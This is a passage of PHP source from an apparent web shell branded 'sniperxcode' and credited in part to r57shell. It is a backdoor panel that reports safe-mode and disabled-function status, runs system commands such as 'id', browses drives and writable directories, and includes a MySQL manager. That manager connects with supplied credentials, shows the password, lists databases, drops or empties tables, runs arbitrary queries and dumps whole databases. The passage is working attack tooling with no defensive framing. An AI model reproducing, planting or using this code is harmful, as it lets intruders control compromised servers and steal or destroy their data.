1263. $hsafemode ＝ "＜font color＝red＞ON （secure）＜/font＞";
1264. }
1265. else {$safemode ＝ FALSE; $hsafemode ＝ "＜font color＝green＞OFF （not secure）＜/font＞";}
1266. $v ＝ @ini_get（"open_basedir"）;
1267. if （$v or strtolower（$v） ＝＝ "on"） {$openbasedir ＝ TRUE; $hopenbasedir ＝ "＜font color＝red＞".$v."＜/font＞";}
1268. else {$openbasedir ＝ FALSE; $hopenbasedir ＝ "＜font color＝green＞OFF （not secure）＜/font＞";}
1269. $sort ＝ htmlspecialchars（$sort）;
1270. if （empty（$sort）） {$sort ＝ $sort_default;}
1271. $sort[1] ＝ strtolower（$sort[1]）;
1272. $DISP_SERVER_SOFTWARE ＝ getenv（"SERVER_SOFTWARE"）;
1273. if （!ereg（"PHP/".phpversion（）,$DISP_SERVER_SOFTWARE）） {$DISP_SERVER_SOFTWARE .＝ ". PHP/".phpversion（）;}
1274. $DISP_SERVER_SOFTWARE ＝ str_replace（"PHP/".phpversion（）,"＜a href＝\"".$surl."act＝phpinfo\" target＝\"_blank\"＞＜b＞＜u＞PHP/".phpversion（）."＜/u＞＜/b＞＜/a＞",htmlspecialchars（$DISP_SERVER_SOFTWARE））;
1275. @ini_set（"highlight.bg",$highlight_bg）; //FFFFFF
1276. @ini_set（"highlight.comment",$highlight_comment）; //#FF8000
1277. @ini_set（"highlight.default",$highlight_default）; //#0000BB
1278. @ini_set（"highlight.html",$highlight_html）; //#000000
1279. @ini_set（"highlight.keyword",$highlight_keyword）; //#007700
1280. @ini_set（"highlight.string",$highlight_string）; //#DD0000
1281. if （!is_array（$actbox）） {$actbox ＝ array（）;}
1282. $dspact ＝ $act ＝ htmlspecialchars（$act）;
1283. $disp_fullpath ＝ $ls_arr ＝ $notls ＝ null;
1284. $ud ＝ urlencode（$d）;
1285. // took the disabled functions from r57shell
1286. ?＞＜html＞＜head＞＜meta http-equiv＝"Content-Type" content＝"text/html; charset＝windows-1251"＞＜meta http-equiv＝"Content-Language" content＝"en-us"＞＜title＞＜?php echo getenv（"HTTP_HOST"）; ?＞ - sniperxcode＜/title＞＜STYLE＞TD { FONT-SIZE: 8pt; COLOR: #cc7700; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #cc7700; scrollbar-shadow-color: #000000; scrollbar-highlight-color: #00CC00; scrollbar-3dlight-color: #00CC00; scrollbar-darkshadow-color: #cc7700; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #000000; COLOR: green; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #cc7700; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #f89521; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #f89521; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #f89521; TEXT-DECORATION: none;}A:hover { COLOR: #f89521; TEXT-DECORATION: bold;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #cc7700; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #cc7700;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}＜/style＞＜/head＞＜BODY text＝#ffffff bottomMargin＝0 bgColor＝#000000 leftMargin＝0 topMargin＝0 rightMargin＝0 marginheight＝0 marginwidth＝0＞＜center＞＜TABLE style＝"BORDER-COLLAPSE: collapse" height＝1 cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 width＝"100%" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1 bordercolor＝"#C0C0C0"＞＜tr＞＜th width＝"101%" height＝"15" nowrap bordercolor＝"#C0C0C0" valign＝"top" colspan＝"2"＞＜p＞＜center＞＜img src＝'http://delux0.by.ru/deluxhaker.jpg'＞＜/p＞＜/center＞＜/th＞＜/tr＞＜tr＞＜td＞
1287. ＜table border＝0 width＝100%＞
1288. ＜tr＞＜td colspan＝2＞＜center＞＜b＞＜?php echo $DISP_SERVER_SOFTWARE; ?＞＜/td＞＜/tr＞
1289. ＜tr＞＜td＞＜b＞Kernel: ＜?php echo wordwrap（php_uname（）,90,'＜br＞',1）; if（$win） echo ' （'.exec（'ver'）.'）'; ?＞＜/b＞＜/td＞＜td align＝right＞＜b＞Safe-Mode: ＜?php echo $hsafemode; ?＞＜/b＞＜/td＞＜/tr＞
1290. ＜tr＞＜td＞＜b＞＜?php if （!$win） {echo wordwrap（myshellexec（'id'）,90,'＜br＞',1）;} else {echo 'Running As: '.get_current_user（）;} ?＞＜/b＞＜/td＞＜td align＝right＞＜b＞Disabled PHP Functions: ＜?php if（''＝＝（$df＝@ini_get（'disable_functions'）））{echo '＜font color＝green＞NONE＜/font＞＜/b＞';}else{echo '＜font color＝red＞$df＜/font＞＜/b＞';} ?＞＜/b＞＜/td＞＜/tr＞
1291. ＜tr＞＜td＞＜?php
1292.  
1293. // ***
1294. $d ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$d）;
1295. if （empty（$d）） {$d ＝ realpath（"."）;} elseif（realpath（$d）） {$d ＝ realpath（$d）;}
1296. $d ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$d）;
1297. if （substr（$d,-1） !＝ DIRECTORY_SEPARATOR） {$d .＝ DIRECTORY_SEPARATOR;}
1298. $d ＝ str_replace（"\\\\","\\",$d）;
1299. $dispd ＝ htmlspecialchars（$d）;
1300. $pd ＝ $e ＝ explode（DIRECTORY_SEPARATOR,substr（$d,0,-1））;
1301. $i ＝ 0;
1302. // ***
1303.  
1304. if （is_callable（'disk_free_space'））
1305. {
1306. $free ＝ disk_free_space（$d）;
1307. $total ＝ disk_total_space（$d）;
1308. if （$free ＝＝＝ FALSE） {$free ＝ 0;}
1309. if （$total ＝＝＝ FALSE） {$total ＝ 0;}
1310. if （$free ＜ 0） {$free ＝ 0;}
1311. if （$total ＜ 0） {$total ＝ 0;}
1312. $used ＝ $total-$free;
1313. $free_percent ＝ round（100/（$total/$free）,2）;
1314. echo '＜b＞Free '.view_size（$free）.' of '.view_size（$total）.' （'.$free_percent.'%）＜/b＞';
1315. }
1316. echo '＜/td＞＜td align＝right＞＜b＞Server IP: ＜a href＝http://whois.domaintools.com/'.gethostbyname（$_SERVER["HTTP_HOST"]）.'＞'.gethostbyname（$_SERVER["HTTP_HOST"]）.'＜/a＞ - Your IP: ＜a href＝http://whois.domaintools.com/'.$_SERVER["REMOTE_ADDR"].'＞'.$_SERVER["REMOTE_ADDR"].'＜/a＞＜/b＞＜/td＞＜/tr＞';
1317. ?＞
1318. ＜/table＞
1319. ＜br＞
1320. ＜p align＝"left"＞＜?php
1321. // moved the dir stuff up above the disk free space so that it still gets the variables, even though it's being called before the echo current dir （put *** around it）
1322. foreach（$pd as $b）
1323. {
1324. $t ＝ '';
1325. $j ＝ 0;
1326. foreach （$e as $r）
1327. {
1328. $t.＝ $r.DIRECTORY_SEPARATOR;
1329. if （$j ＝＝ $i） {break;}
1330. $j++;
1331. }
1332. echo '＜a href＝"'.$surl.'act＝ls&d＝'.urlencode（$t）.'&sort＝'.$sort.'"＞＜b＞'.htmlspecialchars（$b）.DIRECTORY_SEPARATOR.'＜/b＞＜/a＞';
1333. $i++;
1334. }
1335. echo '   ';
1336. if （is_writable（$d））
1337. {
1338. $wd ＝ TRUE;
1339. $wdt ＝ "＜font color＝green＞[ ok ]＜/font＞";
1340. echo "＜b＞＜font color＝green＞".view_perms（fileperms（$d））."＜/font＞＜/b＞";
1341. }
1342. else
1343. {
1344. $wd ＝ FALSE;
1345. $wdt ＝ "＜font color＝red＞[ Read-Only ]＜/font＞";
1346. echo '＜b＞'.view_perms_color（$d）.'＜/b＞';
1347. }
1348.  
1349. echo '＜br＞';
1350. $letters ＝ '';
1351. if （$win）
1352. {
1353. $v ＝ explode（"\\",$d）;
1354. $v ＝ $v[0];
1355. foreach （range（'a','z'） as $letter）
1356. {
1357. $bool ＝ $isdiskette ＝ in_array（$letter,$safemode_diskettes）;
1358. if （!$bool） {$bool ＝ is_dir（$letter.":\\"）;}
1359. if （$bool）
1360. {
1361. $letters .＝ "＜a href＝\"".$surl."act＝ls&d＝".urlencode（strtoupper（$letter）.":\\"）."\"".（$isdiskette?" onclick＝\"return confirm（'Make sure that the diskette is inserted properly, otherwise an error may occur.'）\"":""）."＞[";
1362. if （$letter.":" !＝ $v） {$letters .＝ strtoupper（$letter）;}
1363. else {$letters .＝ '＜font color＝green＞'.strtoupper（$letter）.'＜/font＞';}
1364. $letters .＝ ":]＜/a＞ ";
1365. }
1366. }
1367. if （!empty（$letters）） {echo "＜b＞Detected drives＜/b＞: ".$letters."＜br＞";}
1368. }
1369. if （count（$quicklaunch） ＞ 0）
1370. {
1371. foreach（$quicklaunch as $item）
1372. {
1373. $item[1] ＝ str_replace（"%d",urlencode（$d）,$item[1]）;
1374. $item[1] ＝ str_replace（"%sort",$sort,$item[1]）;
1375. $v ＝ realpath（$d.".."）;
1376. if （empty（$v）） {$a ＝ explode（DIRECTORY_SEPARATOR,$d）; unset（$a[count（$a）-2]）; $v ＝ join（DIRECTORY_SEPARATOR,$a）;}
1377. $item[1] ＝ str_replace（"%upd",urlencode（$v）,$item[1]）;
1378. echo "＜a href＝\"".$item[1]."\"＞".$item[0]."＜/a＞    ";
1379. }
1380. }
1381. if （count（$quicklaunch2） ＞ 0）
1382. {
1383. echo '＜br＞';
1384. foreach（$quicklaunch2 as $item）
1385. {
1386. $item[1] ＝ str_replace（"%d",urlencode（$d）,$item[1]）;
1387. $item[1] ＝ str_replace（"%sort",$sort,$item[1]）;
1388. $v ＝ realpath（$d.".."）;
1389. if （empty（$v）） {$a ＝ explode（DIRECTORY_SEPARATOR,$d）; unset（$a[count（$a）-2]）; $v ＝ join（DIRECTORY_SEPARATOR,$a）;}
1390. $item[1] ＝ str_replace（"%upd",urlencode（$v）,$item[1]）;
1391. echo "＜a href＝\"".$item[1]."\"＞".$item[0]."＜/a＞    ";
1392. }
1393. }
1394.  
1395. echo "＜/p＞＜/td＞＜/tr＞＜/table＞＜br＞";
1396. if （（!empty（$donated_html）） and （in_array（$act,$donated_act））） {echo "＜TABLE style＝\"BORDER-COLLAPSE: collapse\" cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 width＝\"100%\" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞＜tr＞＜td width＝\"100%\" valign＝\"top\"＞".$donated_html."＜/td＞＜/tr＞＜/table＞＜br＞";}
1397. echo "＜TABLE style＝\"BORDER-COLLAPSE: collapse\" cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 width＝\"100%\" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞＜tr＞＜td width＝\"100%\" valign＝\"top\"＞";
1398. if （$act ＝＝ ""） {$act ＝ $dspact ＝ "ls";}
1399. if （$act ＝＝ "sql"）
1400. {
1401. $sql_surl ＝ $surl."act＝sql";
1402. if （$sql_login） {$sql_surl .＝ "&sql_login＝".htmlspecialchars（$sql_login）;}
1403. if （$sql_passwd） {$sql_surl .＝ "&sql_passwd＝".htmlspecialchars（$sql_passwd）;}
1404. if （$sql_server） {$sql_surl .＝ "&sql_server＝".htmlspecialchars（$sql_server）;}
1405. if （$sql_port） {$sql_surl .＝ "&sql_port＝".htmlspecialchars（$sql_port）;}
1406. if （$sql_db） {$sql_surl .＝ "&sql_db＝".htmlspecialchars（$sql_db）;}
1407. $sql_surl .＝ "&";
1408. ?＞＜h3＞Attention! SQL-Manager is ＜u＞NOT＜/u＞ ready module! Don't reports bugs.＜/h3＞＜TABLE style＝"BORDER-COLLAPSE: collapse" height＝1 cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 width＝"100%" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1 bordercolor＝"#C0C0C0"＞＜tr＞＜td width＝"100%" height＝"1" colspan＝"2" valign＝"top"＞＜center＞＜?php
1409. if （$sql_server）
1410. {
1411. $sql_sock ＝ mysql_connect（$sql_server.":".$sql_port, $sql_login, $sql_passwd）;
1412. $err ＝ mysql_smarterror（）;
1413. @mysql_select_db（$sql_db,$sql_sock）;
1414. if （$sql_query and $submit） {$sql_query_result ＝ mysql_query（$sql_query,$sql_sock）; $sql_query_error ＝ mysql_smarterror（）;}
1415. }
1416. else {$sql_sock ＝ FALSE;}
1417. echo "＜b＞SQL Manager:＜/b＞＜br＞";
1418. if （!$sql_sock）
1419. {
1420. if （!$sql_server） {echo "NO CONNECTION";}
1421. else {echo "＜center＞＜b＞Can't connect＜/b＞＜/center＞"; echo "＜b＞".$err."＜/b＞";}
1422. }
1423. else
1424. {
1425. $sqlquicklaunch ＝ array（）;
1426. $sqlquicklaunch[] ＝ array（"Index",$surl."act＝sql&sql_login＝".htmlspecialchars（$sql_login）."&sql_passwd＝".htmlspecialchars（$sql_passwd）."&sql_server＝".htmlspecialchars（$sql_server）."&sql_port＝".htmlspecialchars（$sql_port）."&"）;
1427. $sqlquicklaunch[] ＝ array（"Query",$sql_surl."sql_act＝query&sql_tbl＝".urlencode（$sql_tbl））;
1428. $sqlquicklaunch[] ＝ array（"Server-status",$surl."act＝sql&sql_login＝".htmlspecialchars（$sql_login）."&sql_passwd＝".htmlspecialchars（$sql_passwd）."&sql_server＝".htmlspecialchars（$sql_server）."&sql_port＝".htmlspecialchars（$sql_port）."&sql_act＝serverstatus"）;
1429. $sqlquicklaunch[] ＝ array（"Server variables",$surl."act＝sql&sql_login＝".htmlspecialchars（$sql_login）."&sql_passwd＝".htmlspecialchars（$sql_passwd）."&sql_server＝".htmlspecialchars（$sql_server）."&sql_port＝".htmlspecialchars（$sql_port）."&sql_act＝servervars"）;
1430. $sqlquicklaunch[] ＝ array（"Processes",$surl."act＝sql&sql_login＝".htmlspecialchars（$sql_login）."&sql_passwd＝".htmlspecialchars（$sql_passwd）."&sql_server＝".htmlspecialchars（$sql_server）."&sql_port＝".htmlspecialchars（$sql_port）."&sql_act＝processes"）;
1431. $sqlquicklaunch[] ＝ array（"Logout",$surl."act＝sql"）;
1432. echo "＜center＞＜b＞MySQL ".mysql_get_server_info（）." （proto v.".mysql_get_proto_info （）."） running in ".htmlspecialchars（$sql_server）.":".htmlspecialchars（$sql_port）." as ".htmlspecialchars（$sql_login）."@".htmlspecialchars（$sql_server）." （password - \"".htmlspecialchars（$sql_passwd）."\"）＜/b＞＜br＞";
1433. if （count（$sqlquicklaunch） ＞ 0） {foreach（$sqlquicklaunch as $item） {echo "[ ＜a href＝\"".$item[1]."\"＞＜b＞".$item[0]."＜/b＞＜/a＞ ] ";}}
1434. echo "＜/center＞";
1435. }
1436. echo "＜/td＞＜/tr＞＜tr＞";
1437. if （!$sql_sock） {?＞＜td width＝28% height＝100 valign＝top＞＜li＞If login is null, login is owner of process.＜li＞If host is null, host is localhost （default）.＜/b＞＜li＞If port is null, port is 3306 （default）.＜/td＞＜td width＝90% height＝1 valign＝top＞＜TABLE height＝1 cellSpacing＝0 cellPadding＝0 width＝100% border＝0＞＜tr＞＜td＞ ＜b＞Please, fill the form:＜/b＞＜table＞＜tr＞＜td＞＜b＞Username＜/b＞＜/td＞＜td＞＜b＞Password＜/b＞＜/td＞＜td＞＜b＞Database＜/b＞＜/td＞＜/tr＞＜form action＝"＜?php echo $surl; ?＞" method＝POST＞＜input type＝hidden name＝"act" value＝"sql"＞＜tr＞＜td＞＜input type＝text name＝"sql_login" value＝"root" maxlength＝64＞＜/td＞＜td＞＜input type＝text name＝"sql_passwd" maxlength＝64＞＜/td＞＜td＞＜input type＝text name＝"sql_db" maxlength＝64＞＜/td＞＜/tr＞＜tr＞＜td＞＜b＞Host＜/b＞＜/td＞＜td＞＜b＞Port＜/b＞＜/td＞＜/tr＞＜tr＞＜td align＝right＞＜input type＝text name＝"sql_server" value＝"localhost" maxlength＝64＞＜/td＞＜td＞＜input type＝text name＝"sql_port" value＝"3306" maxlength＝6 size＝3＞＜/td＞＜td＞＜input type＝submit value＝"Connect"＞＜/td＞＜/tr＞＜tr＞＜td＞＜/td＞＜/tr＞＜/form＞＜/table＞＜/td＞＜?php }
1438. else
1439. {
1440. //Start left panel
1441. if （!empty（$sql_db））
1442. {
1443. ?＞＜td width＝"25%" height＝"100%" valign＝"top"＞＜a href＝"＜?php echo $surl."act＝sql&sql_login＝".htmlspecialchars（$sql_login）."&sql_passwd＝".htmlspecialchars（$sql_passwd）."&sql_server＝".htmlspecialchars（$sql_server）."&sql_port＝".htmlspecialchars（$sql_port）."&"; ?＞"＞＜b＞Home＜/b＞＜/a＞＜hr size＝"1" noshade＞＜?php
1444. $result ＝ mysql_list_tables（$sql_db）;
1445. if （!$result） {echo mysql_smarterror（）;}
1446. else
1447. {
1448. echo "---[ ＜a href＝\"".$sql_surl."&\"＞＜b＞".htmlspecialchars（$sql_db）."＜/b＞＜/a＞ ]---＜br＞";
1449. $c ＝ 0;
1450. while （$row ＝ mysql_fetch_array（$result）） {$count ＝ mysql_query （"SELECT COUNT（*） FROM ".$row[0]）; $count_row ＝ mysql_fetch_array（$count）; echo "＜b＞+ ＜a href＝\"".$sql_surl."sql_db＝".htmlspecialchars（$sql_db）."&sql_tbl＝".htmlspecialchars（$row[0]）."\"＞＜b＞".htmlspecialchars（$row[0]）."＜/b＞＜/a＞ （".$count_row[0]."）＜/br＞＜/b＞"; mysql_free_result（$count）; $c++;}
1451. if （!$c） {echo "No tables found in database.";}
1452. }
1453. }
1454. else
1455. {
1456. ?＞＜td width＝"1" height＝"100" valign＝"top"＞＜a href＝"＜?php echo $sql_surl; ?＞"＞＜b＞Home＜/b＞＜/a＞＜hr size＝"1" noshade＞＜?php
1457. $result ＝ mysql_list_dbs（$sql_sock）;
1458. if （!$result） {echo mysql_smarterror（）;}
1459. else
1460. {
1461. ?＞＜form action＝"＜?php echo $surl; ?＞"＞＜input type＝"hidden" name＝"act" value＝"sql"＞＜input type＝"hidden" name＝"sql_login" value＝"＜?php echo htmlspecialchars（$sql_login）; ?＞"＞＜input type＝"hidden" name＝"sql_passwd" value＝"＜?php echo htmlspecialchars（$sql_passwd）; ?＞"＞＜input type＝"hidden" name＝"sql_server" value＝"＜?php echo htmlspecialchars（$sql_server）; ?＞"＞＜input type＝"hidden" name＝"sql_port" value＝"＜?php echo htmlspecialchars（$sql_port）; ?＞"＞＜select name＝"sql_db"＞＜?php
1462. $c ＝ 0;
1463. $dbs ＝ "";
1464. while （$row ＝ mysql_fetch_row（$result）） {$dbs .＝ "＜option value＝\"".$row[0]."\""; if （$sql_db ＝＝ $row[0]） {$dbs .＝ " selected";} $dbs .＝ "＞".$row[0]."＜/option＞"; $c++;}
1465. echo "＜option value＝\"\"＞Databases （".$c."）＜/option＞";
1466. echo $dbs;
1467. }
1468. ?＞＜/select＞＜hr size＝"1" noshade＞Please, select database＜hr size＝"1" noshade＞＜input type＝"submit" value＝"Go"＞＜/form＞＜?php
1469. }
1470. //End left panel
1471. echo "＜/td＞＜td width＝\"100%\" height＝\"1\" valign＝\"top\"＞";
1472. //Start center panel
1473. $diplay ＝ TRUE;
1474. if （$sql_db）
1475. {
1476. if （!is_numeric（$c）） {$c ＝ 0;}
1477. if （$c ＝＝ 0） {$c ＝ "no";}
1478. echo "＜hr size＝\"1\" noshade＞＜center＞＜b＞There are ".$c." table（s） in this DB （".htmlspecialchars（$sql_db）."）.＜br＞";
1479. if （count（$dbquicklaunch） ＞ 0） {foreach（$dbsqlquicklaunch as $item） {echo "[ ＜a href＝\"".$item[1]."\"＞".$item[0]."＜/a＞ ] ";}}
1480. echo "＜/b＞＜/center＞";
1481. $acts ＝ array（"","dump"）;
1482. if （$sql_act ＝＝ "tbldrop"） {$sql_query ＝ "DROP TABLE"; foreach（$boxtbl as $v） {$sql_query .＝ "\n`".$v."` ,";} $sql_query ＝ substr（$sql_query,0,-1）.";"; $sql_act ＝ "query";}
1483. elseif （$sql_act ＝＝ "tblempty"） {$sql_query ＝ ""; foreach（$boxtbl as $v） {$sql_query .＝ "DELETE FROM `".$v."` \n";} $sql_act ＝ "query";}
1484. elseif （$sql_act ＝＝ "tbldump"） {if （count（$boxtbl） ＞ 0） {$dmptbls ＝ $boxtbl;} elseif（$thistbl） {$dmptbls ＝ array（$sql_tbl）;} $sql_act ＝ "dump";}
1485. elseif （$sql_act ＝＝ "tblcheck"） {$sql_query ＝ "CHECK TABLE"; foreach（$boxtbl as $v） {$sql_query .＝ "\n`".$v."` ,";} $sql_query ＝ substr（$sql_query,0,-1）.";"; $sql_act ＝ "query";}
1486. elseif （$sql_act ＝＝ "tbloptimize"） {$sql_query ＝ "OPTIMIZE TABLE"; foreach（$boxtbl as $v） {$sql_query .＝ "\n`".$v."` ,";} $sql_query ＝ substr（$sql_query,0,-1）.";"; $sql_act ＝ "query";}
1487. elseif （$sql_act ＝＝ "tblrepair"） {$sql_query ＝ "REPAIR TABLE"; foreach（$boxtbl as $v） {$sql_query .＝ "\n`".$v."` ,";} $sql_query ＝ substr（$sql_query,0,-1）.";"; $sql_act ＝ "query";}
1488. elseif （$sql_act ＝＝ "tblanalyze"） {$sql_query ＝ "ANALYZE TABLE"; foreach（$boxtbl as $v） {$sql_query .＝ "\n`".$v."` ,";} $sql_query ＝ substr（$sql_query,0,-1）.";"; $sql_act ＝ "query";}
1489. elseif （$sql_act ＝＝ "deleterow"） {$sql_query ＝ ""; if （!empty（$boxrow_all）） {$sql_query ＝ "DELETE * FROM `".$sql_tbl."`;";} else {foreach（$boxrow as $v） {$sql_query .＝ "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query ＝ substr（$sql_query,0,-1）;} $sql_act ＝ "query";}
1490. elseif （$sql_tbl_act ＝＝ "insert"）
1491. {
1492. if （$sql_tbl_insert_radio ＝＝ 1）
1493. {
1494. $keys ＝ "";
1495. $akeys ＝ array_keys（$sql_tbl_insert）;
1496. foreach （$akeys as $v） {$keys .＝ "`".addslashes（$v）."`, ";}
1497. if （!empty（$keys）） {$keys ＝ substr（$keys,0,strlen（$keys）-2）;}
1498. $values ＝ "";
1499. $i ＝ 0;
1500. foreach （array_values（$sql_tbl_insert） as $v） {if （$funct ＝ $sql_tbl_insert_functs[$akeys[$i]]） {$values .＝ $funct." （";} $values .＝ "'".addslashes（$v）."'"; if （$funct） {$values .＝ "）";} $values .＝ ", "; $i++;}
1501. if （!empty（$values）） {$values ＝ substr（$values,0,strlen（$values）-2）;}
1502. $sql_query ＝ "INSERT INTO `".$sql_tbl."` （ ".$keys." ） VALUES （ ".$values." ）;";
1503. $sql_act ＝ "query";
1504. $sql_tbl_act ＝ "browse";
1505. }
1506. elseif （$sql_tbl_insert_radio ＝＝ 2）
1507. {
1508. $set ＝ mysql_buildwhere（$sql_tbl_insert,", ",$sql_tbl_insert_functs）;
1509. $sql_query ＝ "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
1510. $result ＝ mysql_query（$sql_query） or print（mysql_smarterror（））;
1511. $result ＝ mysql_fetch_array（$result, MYSQL_ASSOC）;
1512. $sql_act ＝ "query";
1513. $sql_tbl_act ＝ "browse";
1514. }
1515. }
1516. if （$sql_act ＝＝ "query"）
1517. {
1518. echo "＜hr size＝\"1\" noshade＞";
1519. if （（$submit） and （!$sql_query_result） and （$sql_confirm）） {if （!$sql_query_error） {$sql_query_error ＝ "Query was empty";} echo "＜b＞Error:＜/b＞ ＜br＞".$sql_query_error."＜br＞";}
1520. if （$sql_query_result or （!$sql_confirm）） {$sql_act ＝ $sql_goto;}
1521. if （（!$submit） or （$sql_act）） {echo "＜table border＝\"0\" width＝\"100%\" height＝\"1\"＞＜tr＞＜td＞＜form action＝\"".$sql_surl."\" method＝\"POST\"＞＜b＞"; if （（$sql_query） and （!$submit）） {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "＜/b＞＜br＞＜br＞＜textarea name＝\"sql_query\" cols＝\"100\" rows＝\"10\"＞".htmlspecialchars（$sql_query）."＜/textarea＞＜br＞＜br＞＜input type＝\"hidden\" name＝\"sql_act\" value＝\"query\"＞＜input type＝\"hidden\" name＝\"sql_tbl\" value＝\"".htmlspecialchars（$sql_tbl）."\"＞＜input type＝\"hidden\" name＝\"submit\" value＝\"1\"＞＜input type＝\"hidden\" name＝\"sql_goto\" value＝\"".htmlspecialchars（$sql_goto）."\"＞＜input type＝\"submit\" name＝\"sql_confirm\" value＝\"Yes\"＞ ＜input type＝\"submit\" value＝\"No\"＞＜/form＞＜/td＞＜/tr＞＜/table＞";}
1522. }
1523. if （in_array（$sql_act,$acts））
1524. {
1525. ?＞＜table border＝"0" width＝"100%" height＝"1"＞＜tr＞＜td width＝"30%" height＝"1"＞＜b＞Create new table:＜/b＞＜form action＝"＜?php echo $surl; ?＞"＞＜input type＝"hidden" name＝"act" value＝"sql"＞＜input type＝"hidden" name＝"sql_act" value＝"newtbl"＞＜input type＝"hidden" name＝"sql_db" value＝"＜?php echo htmlspecialchars（$sql_db）; ?＞"＞＜input type＝"hidden" name＝"sql_login" value＝"＜?php echo htmlspecialchars（$sql_login）; ?＞"＞＜input type＝"hidden" name＝"sql_passwd" value＝"＜?php echo htmlspecialchars（$sql_passwd）; ?＞"＞＜input type＝"hidden" name＝"sql_server" value＝"＜?php echo htmlspecialchars（$sql_server）; ?＞"＞＜input type＝"hidden" name＝"sql_port" value＝"＜?php echo htmlspecialchars（$sql_port）; ?＞"＞＜input type＝"text" name＝"sql_newtbl" size＝"20"＞ ＜input type＝"submit" value＝"Create"＞＜/form＞＜/td＞＜td width＝"30%" height＝"1"＞＜b＞Dump DB:＜/b＞＜form action＝"＜?php echo $surl; ?＞"＞＜input type＝"hidden" name＝"act" value＝"sql"＞＜input type＝"hidden" name＝"sql_act" value＝"dump"＞＜input type＝"hidden" name＝"sql_db" value＝"＜?php echo htmlspecialchars（$sql_db）; ?＞"＞＜input type＝"hidden" name＝"sql_login" value＝"＜?php echo htmlspecialchars（$sql_login）; ?＞"＞＜input type＝"hidden" name＝"sql_passwd" value＝"＜?php echo htmlspecialchars（$sql_passwd）; ?＞"＞＜input type＝"hidden" name＝"sql_server" value＝"＜?php echo htmlspecialchars（$sql_server）; ?＞"＞＜input type＝"hidden" name＝"sql_port" value＝"＜?php echo htmlspecialchars（$sql_port）; ?＞"＞＜input type＝"text" name＝"dump_file" size＝"30" value＝"＜?php echo "dump_".getenv（"SERVER_NAME"）."_".$sql_db."_".date（"d-m-Y-H-i-s"）.".sql"; ?＞"＞ ＜input type＝"submit" name＝\"submit\" value＝"Dump"＞＜/form＞＜/td＞＜td width＝"30%" height＝"1"＞＜/td＞＜/tr＞＜tr＞＜td width＝"30%" height＝"1"＞＜/td＞＜td width＝"30%" height＝"1"＞＜/td＞＜td width＝"30%" height＝"1"＞＜/td＞＜/tr＞＜/table＞＜?php
1526. if （!empty（$sql_act）） {echo "＜hr size＝\"1\" noshade＞";}
1527. if （$sql_act ＝＝ "newtbl"）
1528. {
1529.  
1530. echo "＜b＞";
1531. if （（mysql_create_db （$sql_newdb）） and （!empty（$sql_newdb））） {echo "DB \"".htmlspecialchars（$sql_newdb）."\" has been created with success!＜/b＞＜br＞";
1532. }
1533. else {echo "Can't create DB \"".htmlspecialchars（$sql_newdb）."\".＜br＞Reason:＜/b＞ ".mysql_smarterror（）;}
1534. }
1535. elseif （$sql_act ＝＝ "dump"）
1536. {
1537. if （empty（$submit））
1538. {
1539. $diplay ＝ FALSE;
1540. echo "＜form method＝\"GET\"＞＜input type＝\"hidden\" name＝\"act\" value＝\"sql\"＞＜input type＝\"hidden\" name＝\"sql_act\" value＝\"dump\"＞＜input type＝\"hidden\" name＝\"sql_db\" value＝\"".htmlspecialchars（$sql_db）."\"＞＜input type＝\"hidden\" name＝\"sql_login\" value＝\"".htmlspecialchars（$sql_login）."\"＞＜input type＝\"hidden\" name＝\"sql_passwd\" value＝\"".htmlspecialchars（$sql_passwd）."\"＞＜input type＝\"hidden\" name＝\"sql_server\" value＝\"".htmlspecialchars（$sql_server）."\"＞＜input type＝\"hidden\" name＝\"sql_port\" value＝\"".htmlspecialchars（$sql_port）."\"＞＜input type＝\"hidden\" name＝\"sql_tbl\" value＝\"".htmlspecialchars（$sql_tbl）."\"＞＜b＞SQL-Dump:＜/b＞＜br＞＜br＞";
1541. echo "＜b＞DB:＜/b＞ ＜input type＝\"text\" name＝\"sql_db\" value＝\"".urlencode（$sql_db）."\"＞＜br＞＜br＞";
1542. $v ＝ join （";",$dmptbls）;
